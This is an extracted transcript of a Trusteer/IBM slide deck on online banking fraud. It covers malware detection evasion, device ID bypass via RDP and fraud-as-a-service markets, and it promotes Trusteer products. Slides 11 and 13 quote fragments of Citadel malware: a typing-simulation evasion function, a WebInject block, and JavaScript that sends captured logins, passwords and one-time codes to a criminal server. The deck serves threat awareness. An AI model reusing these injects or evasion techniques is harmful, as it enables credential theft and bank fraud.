online fraud: threats & trends - ibm › ru › events › presentations › cloud13 ›...
TRANSCRIPT
![Page 1: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/1.jpg)
Online Fraud: Threats & Trends
Ziv Cohen
Director, EMEA Sales
![Page 2: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/2.jpg)
Trusteer Confidential 2012 ©
Criminals Attack the Weak Link With Malware
2
Customer Accounts
Cyber Criminals
Difficult
Easy
Easy
Retail/Business Customer
![Page 3: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/3.jpg)
Trusteer Confidential 2013 ©
Protect Your Investment
Two emerging trends for malware:
Back to the basics tactics: reviving old techniques to bypass security solutions
Malware security: investing in malware protection from: - Malware detection systems
- Anomaly detection systems
- Behavior profiling systems
- Device ID solutions
- And more…
Cybercrime forum trends – more services that help outsource technical aspects of fraud
3
![Page 4: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/4.jpg)
Trusteer Confidential 2013 ©
Evading Detection (Wrapper)
4
![Page 5: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/5.jpg)
Trusteer Confidential 2013 ©
Evading Detection
5
![Page 6: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/6.jpg)
Trusteer Confidential 2012 ©
Undetectable to AVs
6
![Page 7: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/7.jpg)
Trusteer Confidential 2012 ©
Undetectable to AVs
7
![Page 8: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/8.jpg)
Trusteer Confidential 2013 ©
Bypassing Device ID (RDP)
Notification
Login
Injection
![Page 9: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/9.jpg)
Trusteer Confidential 2013 ©
Bypassing Device ID (RDP)
RDP
Transaction
![Page 10: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/10.jpg)
Trusteer Confidential 2013 ©
Bypassing Device ID
![Page 11: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/11.jpg)
Trusteer Confidential 2013 ©
Behavior Anomaly Evasion
slow_fill = function(id, text) { var i=1; beepInput(id); var thread=setInterval( function() { id.value=text.substr(0,i); i++; if (i==text.length+1) { clearInterval(thread); deleteHelpMessage(); } } , 200); }
![Page 12: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/12.jpg)
Trusteer Confidential 2013 ©
Russian Banks Targeted by Malware
12
The attacker:
Citadel – a descendant of Zeus
MITB functionality
The targets:
VTB24 (/WebNew/login.aspx)
Russian Standard Bank (rsb.ru)
Avangard Bank (avangard.ru)
The method:
Steal credentials
Steal OTPs
HTML Injection
Real time victim-to-cybercriminal communications
![Page 13: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/13.jpg)
Trusteer Confidential 2013 ©
Example of attack flow
13
Capture credentials in real time
The malware checks the credentials validity
Communicate with the user
Credentials are sent to the C&C in real time via Jabber
Cybercriminal logs in using the credentials, after pausing the victim
<WebInject> <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before> <After><![CDATA[]]></After> <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data> </WebInject>
function Check(){ if(login.value.length > 3 && pass.value.length > 3) { write_c('login',login.value,3); write_c('pass',pass.value,3); check_block(); } }
Пожалуйста , ожидайте . Происходит Авторизация!
function KnockToAdmin() {var link = log_link+"?log="+read_c('login')+"&pass="+read_c('pass')+"&tan="+tan.value; GetDataACD_knock_to_admin(link); } function SendMsg(msg) { var link = jabb_link+'?log='+msg; GetDataACD_sendmsg(link); }
function WaitForBlock() { var link = admin_logs+read_c('login')+'/block.me'; GetDataACD_WaitForBlock(link); } function WaitForNextCode() { var link = admin_logs+read_c('login')+'/kod.2'; GetDataACD_WaitForNextCode(link); } function WaitForFreeUse() { var link = admin_logs+read_c('login')+'/free.use'; GetDataACD_WaitForFreeUse(link); } function OnLoadACD_check_block() {
![Page 14: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/14.jpg)
Trusteer Confidential 2013 ©
Fraud as a Service An Identity is Born
![Page 15: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/15.jpg)
Trusteer Confidential 2013 ©
Fraud as a Service Create A New Account
Selling bank accounts packages: • Bank account information + ATM card • Online banking credentials • Official documents (including passports) • Price: 12,000 Ruble (~$360) Also offering a cashout service for a 5% fee
![Page 16: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/16.jpg)
Trusteer Confidential 2013 ©
Fraud as a Service
"Will buy a Corporate identity in one of the following countries" A corporate identity is an identity, online or real, which is authorized to perform changes and transfers in a corporate bank account.
I'm interested in credentials. Can be mixed countries, with United Arab Emirates, also interested in Poland, Italy, Netherlands
![Page 17: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/17.jpg)
Trusteer Confidential 2013 ©
Too Lazy?
18
![Page 18: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/18.jpg)
Trusteer Confidential 2013 ©
Security Silos FAIL!
![Page 19: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/19.jpg)
Trusteer Confidential 2013 © 20
Holistic Approach for Cybercrime
WWW
Phishing and Malware Fraud
Advanced Threats (Employees)
Online/Mobile Banking
Money, Intellectual Property, Business Data
Account Takeover, New Account Fraud
Mobile Fraud Risk
![Page 20: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/20.jpg)
Trusteer Confidential 2013 ©
Trusteer Cybercrime Prevention Architecture
Compact software agent that prevents malware and Phishing attacks
Endpoint solutions for detecting malware, jailbreak, and other mobile risk factors
Out-of-Band Authentication
100% accurate clientless detection of active MitB malware on users’ devices
Conclusive criminal access detection by correlating device fingerprint and account compromise history
Trusteer Rapport PC/Mac
Trusteer Mobile iOS, Android
Trusteer Pinpoint Malware Detection
Trusteer Pinpoint ATO Detection
Centralized Management, Alerting, Reporting
21
![Page 21: Online Fraud: Threats & Trends - IBM › ru › events › presentations › cloud13 › 04...Fraud as a Service Create A New Account Selling bank accounts packages: •Bank account](https://reader033.vdocuments.us/reader033/viewer/2022060400/5f0e058f7e708231d43d3b07/html5/thumbnails/21.jpg)
Thank You